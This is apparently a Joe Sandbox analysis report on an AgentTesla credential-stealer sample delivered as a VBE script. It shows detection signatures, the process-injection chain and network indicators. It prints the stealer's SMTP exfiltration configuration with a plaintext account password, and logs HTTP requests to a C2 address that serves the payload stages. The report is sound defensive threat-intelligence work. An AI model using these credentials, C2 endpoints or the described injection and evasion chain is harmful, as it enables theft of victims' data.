Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0969686.vbe

Overview

General Information

Sample name:0969686.vbe
Analysis ID:1591702
MD5:4565da69d82d3d17f33436b132261de7
SHA1:5e124ae25d9ec64cc681546299e0fa2d4f4b50d4
SHA256:e2604e06a1d397760f22a668b48821dc20f06a8c3a28d165b9c96569b0e88bbb
Tags:vbeuser-lowmal3
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: MSBuild connects to smtp port
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
AI detected suspicious sample
Injects a PE file into a foreign processes
Potential evasive VBS script found (sleep loop)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5028 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0969686.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 6256 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\uaDoJtHubxengYS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5244 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 2920 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • wermgr.exe (PID: 1240 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5244" "2828" "2700" "2832" "0" "0" "2836" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.3309367586.000000000302C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.3309367586.0000000003034000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.3306974664.0000000000D92000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000002.3306974664.0000000000D92000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000005.00000002.3309367586.0000000003001000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 3 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              5.2.MSBuild.exe.d90000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                5.2.MSBuild.exe.d90000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  5.2.MSBuild.exe.d90000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x334eb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x3355d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x335e7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x33679:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x336e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x33755:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x337eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3387b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi64_5244.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                  • 0xc137:$b2: ::FromBase64String(
                  • 0xbda3:$s1: -join
                  • 0xc14b:$s1: -join
                  • 0x554f:$s4: +=
                  • 0x5611:$s4: +=
                  • 0x9838:$s4: +=
                  • 0xb955:$s4: +=
                  • 0xbc3f:$s4: +=
                  • 0xbd85:$s4: +=
                  • 0xe338:$s4: +=
                  • 0xe3b8:$s4: +=
                  • 0xe47e:$s4: +=
                  • 0xe4fe:$s4: +=
                  • 0xe6d4:$s4: +=
                  • 0xe758:$s4: +=
                  • 0xff6e:$s4: +=
                  • 0xffee:$s4: +=
                  • 0x100b4:$s4: +=
                  • 0x10134:$s4: +=
                  • 0x1030a:$s4: +=
                  • 0x1038e:$s4: +=

                  Sigma Signatures

                  Networking

                  barindex
                  Sigma detected: MSBuild connects to smtp port
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 2920, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49707

                  System Summary

                  barindex
                  Sigma detected: Script Initiated Connection to Non-Local Network
                  Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5028, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
                  Sigma detected: Silenttrinity Stager Msbuild Activity
                  Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 104.26.13.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 2920, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0969686.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0969686.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0969686.vbe", ProcessId: 5028, ProcessName: wscript.exe
                  Sigma detected: WScript or CScript Dropper - File
                  Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5028, TargetFilename: C:\Users\user\AppData\Roaming\uaDoJtHubxengYS.vbs
                  Sigma detected: Script Initiated Connection
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5028, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0969686.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0969686.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0969686.vbe", ProcessId: 5028, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\uaDoJtHubxengYS.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6256, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 5244, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:19:58.058747+010020301711A Network Trojan was detected192.168.2.549707162.254.34.31587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:20:12.096752+010028555421A Network Trojan was detected192.168.2.549707162.254.34.31587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:20:12.096752+010028552451A Network Trojan was detected192.168.2.549707162.254.34.31587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:19:58.058747+010028400321A Network Trojan was detected192.168.2.549707162.254.34.31587TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 5.2.MSBuild.exe.d90000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.7% probability
                  Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.5:49707 -> 162.254.34.31:587
                  Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49707 -> 162.254.34.31:587
                  Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.5:49707 -> 162.254.34.31:587
                  Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.5:49707 -> 162.254.34.31:587
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 144.91.79.54 80Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.5:49707 -> 162.254.34.31:587
                  Source: Joe Sandbox ViewIP Address: 144.91.79.54 144.91.79.54
                  Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                  Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                  Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                  Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: global trafficTCP traffic: 192.168.2.5:49707 -> 162.254.34.31:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /2412/s HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/v HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/r HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/cn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/file HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/regOwiR4EFZZGKetHoUY.txt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /2412/s HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/v HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/r HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/cn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/file HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/regOwiR4EFZZGKetHoUY.txt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                  Source: wscript.exe, 00000000.00000003.2053497527.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053612462.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065837487.000002C0EB286000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053348477.000002C0EB238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056025031.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053788458.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/
                  Source: wscript.exe, 00000000.00000003.2065837487.000002C0EB286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/0G
                  Source: wscript.exe, 00000000.00000003.2065886438.000002C0ED1E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2066276747.000002C0ED1E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/2
                  Source: wscript.exe, 00000000.00000003.2056025031.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/cn
                  Source: wscript.exe, 00000000.00000003.2056025031.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/cnZ=N
                  Source: wscript.exe, 00000000.00000003.2066491616.000002C0ECFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2066662499.000002C0ECFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2068419216.000002C0ECFC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2059672066.000002C0ECFB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2059672066.000002C0ECFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2066548889.000002C0ECFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2066965201.000002C0ECFC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/file
                  Source: wscript.exe, 00000000.00000003.2053497527.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053401800.000002C0EB213000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053612462.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056423470.000002C0EB213000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053348477.000002C0EB238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053643682.000002C0EB244000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053820937.000002C0EB244000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053788458.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/r
                  Source: wscript.exe, 00000000.00000003.2053497527.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053612462.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053348477.000002C0EB238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053788458.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/r.
                  Source: wscript.exe, 00000000.00000003.2065837487.000002C0EB286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/regOwiR4EFZZGKetHoUY.txt
                  Source: wscript.exe, 00000000.00000003.2067149458.000002C0EB249000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067480640.000002C0EB265000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2066723786.000002C0EB249000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067435586.000002C0EB25E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067314001.000002C0EB256000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067352269.000002C0EB257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/regOwiR4EFZZGKetHoUY.txtP
                  Source: wscript.exe, 00000000.00000003.2066491616.000002C0ECFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048135478.000002C0EB238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2066662499.000002C0ECFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2068419216.000002C0ECFC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2059672066.000002C0ECFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2057456319.000002C0ECFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2066548889.000002C0ECFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2066965201.000002C0ECFC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/s
                  Source: wscript.exe, 00000000.00000003.2053401800.000002C0EB213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/v
                  Source: wscript.exe, 00000000.00000003.2053401800.000002C0EB213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/vs
                  Source: wscript.exe, 00000000.00000003.2065837487.000002C0EB286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/?
                  Source: wscript.exe, 00000000.00000003.2053497527.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053612462.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053348477.000002C0EB238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053788458.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/Indexz=n
                  Source: wscript.exe, 00000000.00000003.2053497527.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053612462.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053348477.000002C0EB238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/gYS0G
                  Source: wscript.exe, 00000000.00000003.2056025031.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/hell
                  Source: wscript.exe, 00000000.00000003.2065837487.000002C0EB286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/ndex
                  Source: wscript.exe, 00000000.00000003.2053497527.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053612462.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053348477.000002C0EB238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/ndexv=b
                  Source: wscript.exe, 00000000.00000003.2066723786.000002C0EB232000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067050019.000002C0EB232000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067149458.000002C0EB235000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2068007859.000002C0EB238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056025031.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54:80/2412/cn
